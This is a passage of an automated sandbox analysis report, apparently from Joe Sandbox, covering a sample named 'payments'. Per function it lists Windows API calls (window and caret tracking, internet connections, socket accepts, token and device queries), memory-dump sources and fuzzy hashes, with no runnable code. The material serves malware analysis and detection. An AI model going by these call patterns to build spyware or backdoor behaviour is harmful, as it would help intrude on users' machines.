                                                                                                                          • Opcode Fuzzy Hash: 32a9cd920d92d00766fce7e77518eb10fb818fb24279c825d7a37ef29469d589
                                                                                                                          • Instruction Fuzzy Hash: 1531ED30680206EFDB299F75C854FBA7BA6FF40310F19C02DEA618B1A1E731D991DB90
                                                                                                                          Function 00CF7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32 ref: 00CF7CB9
                                                                                                                            • Part of subcall function 00CD5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD5F6F
                                                                                                                            • Part of subcall function 00CD5F55: GetCurrentThreadId.KERNEL32 ref: 00CD5F76
                                                                                                                            • Part of subcall function 00CD5F55: AttachThreadInput.USER32(00000000,?,00CD781F), ref: 00CD5F7D
                                                                                                                          • GetCaretPos.USER32(?), ref: 00CF7CCA
                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00CF7D03
                                                                                                                          • GetForegroundWindow.USER32 ref: 00CF7D09
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2759813231-0
                                                                                                                          • Opcode ID: 8470897858b77bfa98dc07d0c23f8887230f3b2f18ecf43bc49739499b217a8a
                                                                                                                          • Instruction ID: 103747d592e5947b39ad0b5e0d0817651131af5ea3207f7e43bc489acbe548ba
                                                                                                                          • Opcode Fuzzy Hash: 8470897858b77bfa98dc07d0c23f8887230f3b2f18ecf43bc49739499b217a8a
                                                                                                                          • Instruction Fuzzy Hash: AE314D72900119AFDB00EFB9C8819EFBBF9EF59314B10806AE815E7211DB309E01DBA0
                                                                                                                          Function 00CFF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFF211
                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D0E4C0,?,?,?,?,?), ref: 00CFF226
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFF270
                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D0E4C0,?,?,?), ref: 00CFF2A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2864067406-0
                                                                                                                          • Opcode ID: 378eddb09773a68bc047d6f83c2603d81fa7b7bac0ea7ab067a974e9b58474b0
                                                                                                                          • Instruction ID: 6fd31c4ffc7a3edfcf9262b5372b9b415e1f909d21036abcc7c72f05b4b841c0
                                                                                                                          • Opcode Fuzzy Hash: 378eddb09773a68bc047d6f83c2603d81fa7b7bac0ea7ab067a974e9b58474b0
                                                                                                                          • Instruction Fuzzy Hash: B5218039500118BFEB258F94C858EFA7BB6EF0A711F048069FA15872A1D7709E52EB61
                                                                                                                          Function 00CE431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE4358
                                                                                                                            • Part of subcall function 00CE43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4401
                                                                                                                            • Part of subcall function 00CE43E2: InternetCloseHandle.WININET(00000000), ref: 00CE449E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1463438336-0
                                                                                                                          • Opcode ID: cc90c38eaebd9b629c3fedb44d6ea9eb13d4b15ae4c4e53a224b58b40aa118ea
                                                                                                                          • Instruction ID: 8881d3ae0f0ed4bbdafa1e3f73d648e41432283f38597783749cdfcd01a82b07
                                                                                                                          • Opcode Fuzzy Hash: cc90c38eaebd9b629c3fedb44d6ea9eb13d4b15ae4c4e53a224b58b40aa118ea
                                                                                                                          • Instruction Fuzzy Hash: 1B21C635200745BFEB199F62DC00FBBB7AAFF44711F14401AFA15D76A0DB719921A7A0
                                                                                                                          Function 00CE8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00CE8AE0
                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00CE8AF2
                                                                                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00CE8AFF
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8B16
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastacceptselect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 385091864-0
                                                                                                                          • Opcode ID: 0f452dcb7a9597d0bddce64eaf229dd1f0bbfb9aec4f2929e7bd2beaf151f92b
                                                                                                                          • Instruction ID: d62ce9caf5661ec1dc48ebda814361a9b35d83cd7c732c3e6b80fa44b808c741
                                                                                                                          • Opcode Fuzzy Hash: 0f452dcb7a9597d0bddce64eaf229dd1f0bbfb9aec4f2929e7bd2beaf151f92b
                                                                                                                          • Instruction Fuzzy Hash: 7D218472A00124AFC7119F69CC85ADE7BEDEF4A354F00816AF84AD7290DB749A45CBA0
                                                                                                                          Function 00CF8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00CF8AA6
                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF8AC0
                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF8ACE
                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CF8ADC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2169480361-0
                                                                                                                          • Opcode ID: 6ce6773ec41736602ffe8e87be1551a205f0ea8ce054d43068c184e9617b3afe
                                                                                                                          • Instruction ID: ca2d16f7538a0cff3c6ee354e24ceadd2a19d2f2f1c281427fb540316e4e79b3
                                                                                                                          • Opcode Fuzzy Hash: 6ce6773ec41736602ffe8e87be1551a205f0ea8ce054d43068c184e9617b3afe
                                                                                                                          • Instruction Fuzzy Hash: 3211D031305515BFEB44AB18CC09FBA7799EF85320F14811AFA26C72E2CF70AD0597A5
                                                                                                                          Function 00CD0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CD0ABB,?,?,?,00CD187A,00000000,000000EF,00000119,?,?), ref: 00CD1E77
                                                                                                                            • Part of subcall function 00CD1E68: lstrcpyW.KERNEL32(00000000,?,?,00CD0ABB,?,?,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD1E9D
                                                                                                                            • Part of subcall function 00CD1E68: lstrcmpiW.KERNEL32(00000000,?,00CD0ABB,?,?,?,00CD187A,00000000,000000EF,00000119,?,?), ref: 00CD1ECE
                                                                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD0AD4
                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD0AFA
                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CD187A,00000000,000000EF,00000119,?,?,00000000), ref: 00CD0B2E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                          • String ID: cdecl
                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                          • Opcode ID: 0f2e63d9007f067f7b3edc0579e62d6262ab8e54626ded78dc18a31f0a9ba438
                                                                                                                          • Instruction ID: c7970c34cfa65e3ee939e8891df7a0d9c320a801a93305b073c368c4ad617ed6
                                                                                                                          • Opcode Fuzzy Hash: 0f2e63d9007f067f7b3edc0579e62d6262ab8e54626ded78dc18a31f0a9ba438
                                                                                                                          • Instruction Fuzzy Hash: 2011AF36200305BFDB25AF68D809E7A77A9FF45314F90802BE906CB350EB719941D7A0
                                                                                                                          Function 00CC2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00CC2FB5
                                                                                                                            • Part of subcall function 00CB395C: __FF_MSGBANNER.LIBCMT ref: 00CB3973
                                                                                                                            • Part of subcall function 00CB395C: __NMSG_WRITE.LIBCMT ref: 00CB397A
                                                                                                                            • Part of subcall function 00CB395C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000001,00000000,?,?,00CAF507,?,0000000E), ref: 00CB399F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 614378929-0
                                                                                                                          • Opcode ID: 23f925484d35fbacd73baf2aaa0fca72b454d670f024528415ad39b6672dc001
                                                                                                                          • Instruction ID: 0935b7ecf1f7a884361f5be4d1c43b53c6dab418d9b5bf29debe1ea1f2390fc9
                                                                                                                          • Opcode Fuzzy Hash: 23f925484d35fbacd73baf2aaa0fca72b454d670f024528415ad39b6672dc001
                                                                                                                          • Instruction Fuzzy Hash: 4E11AB32509325AFDB313BB4FC45B9A3F98AF443A0F24852DFC59D6151DB34C941AAA0
                                                                                                                          Function 00CD058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CD05AC
                                                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CD05C7
                                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CD05DD
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00CD0632
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3137044355-0
                                                                                                                          • Opcode ID: 5c627398067c95fee02ebbb7bdc880a3222e9c52c3a5bb3c902d12308f39366e
                                                                                                                          • Instruction ID: cf46a9f0bf7ffffb123cf26a85583218ba57b5a37cd3e458c13f40d609b9368b
                                                                                                                          • Opcode Fuzzy Hash: 5c627398067c95fee02ebbb7bdc880a3222e9c52c3a5bb3c902d12308f39366e
                                                                                                                          • Instruction Fuzzy Hash: BC215471500319FBD7109F99DC88BDAB7B8EB40700F10845EBA1696250D770DA569B50
                                                                                                                          Function 00CD6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD6733
                                                                                                                          • _memset.LIBCMT ref: 00CD6754
                                                                                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CD67A6
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CD67AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1157408455-0
                                                                                                                          • Opcode ID: 3867ef7d3451770127afa6deedd30f97124dd8045f0721ef61757950015ac707
                                                                                                                          • Instruction ID: 2f59e9bce04885c378509d2270fa0682069359749a3fa1dc36046672196262fe
                                                                                                                          • Opcode Fuzzy Hash: 3867ef7d3451770127afa6deedd30f97124dd8045f0721ef61757950015ac707
                                                                                                                          • Instruction Fuzzy Hash: 1D11C1729012287AE7209BA5AC4DFEBBABCEB44724F11419AF514E7280D6705E80CAB4
                                                                                                                          Function 00CCB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CCAA79
                                                                                                                            • Part of subcall function 00CCAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CCAA83
                                                                                                                            • Part of subcall function 00CCAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CCAA92
                                                                                                                            • Part of subcall function 00CCAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CCAA99
                                                                                                                            • Part of subcall function 00CCAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CCAAAF
                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00CCADE4,?,?), ref: 00CCB21B
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CCB227
                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CCB22E
                                                                                                                          • CopySid.ADVAPI32(?,00000000,?), ref: 00CCB247
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4217664535-0
                                                                                                                          • Opcode ID: a7dc6927ce368deff472fd5cf11d4342e0ea7935d574650a2f3b59ec09c4bb33
                                                                                                                          • Instruction ID: 00397fd38eebf1493caab79f82945b1d14b0f5d001075d6291a43b7a8807ad9c
                                                                                                                          • Opcode Fuzzy Hash: a7dc6927ce368deff472fd5cf11d4342e0ea7935d574650a2f3b59ec09c4bb33
                                                                                                                          • Instruction Fuzzy Hash: 8D118F71A00209BFDB049F94DD86FAEB7A9EF85308F14802DE952D7210D775AE45DB20
                                                                                                                          Function 00CCB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCB498
                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCB4AA
                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCB4C0
                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCB4DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: fce51b5b942a1eb8397e04ea30c25490f7b48c08a1fbd2c3d347c2274a3c55e0
                                                                                                                          • Instruction ID: 00352a1b63c9fae9a5bebb0a505398b5ec2c0043edbc80169e53d4ad519a554e
                                                                                                                          • Opcode Fuzzy Hash: fce51b5b942a1eb8397e04ea30c25490f7b48c08a1fbd2c3d347c2274a3c55e0
                                                                                                                          • Instruction Fuzzy Hash: A011487A900218FFDB11DFA9C881F9DBBB4FB08700F204095E604B7290D771AE11DB94
                                                                                                                          Function 00CAB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00CAB5A5
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00D0E69A
                                                                                                                          • GetCursorPos.USER32(?), ref: 00D0E6A4
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00D0E6AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4127811313-0
                                                                                                                          • Opcode ID: ceac65ada81d041b4ee7a836b8c107539f5f7d265f09301bb9ae3c878943453a
                                                                                                                          • Instruction ID: 1ccb86072022e7e26d2aa91df0c7c63b87988935222a58aa6901a9865137532d
                                                                                                                          • Opcode Fuzzy Hash: ceac65ada81d041b4ee7a836b8c107539f5f7d265f09301bb9ae3c878943453a
                                                                                                                          • Instruction Fuzzy Hash: B6113A3190012ABBDB10DFA4D9459EE7BBAEB0A305F404855E902E7241D730AA82DBB1
                                                                                                                          Function 00CD732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CD7352
                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00CD7385
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CD739B
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CD73A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2880819207-0
                                                                                                                          • Opcode ID: de982bde537f1d6f8d319af285732f603704d0eb574bce2f1e659d6b98772423
                                                                                                                          • Instruction ID: b221190cca2630c4348309b08dd08b793a988b9a02b25533c21fc97238c449c2
                                                                                                                          • Opcode Fuzzy Hash: de982bde537f1d6f8d319af285732f603704d0eb574bce2f1e659d6b98772423
                                                                                                                          • Instruction Fuzzy Hash: A311E172A04314BFC7019BA8DC06ADE7BAA9B45351F044316FD21D33A1E7708E0097B4
                                                                                                                          Function 00CC4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
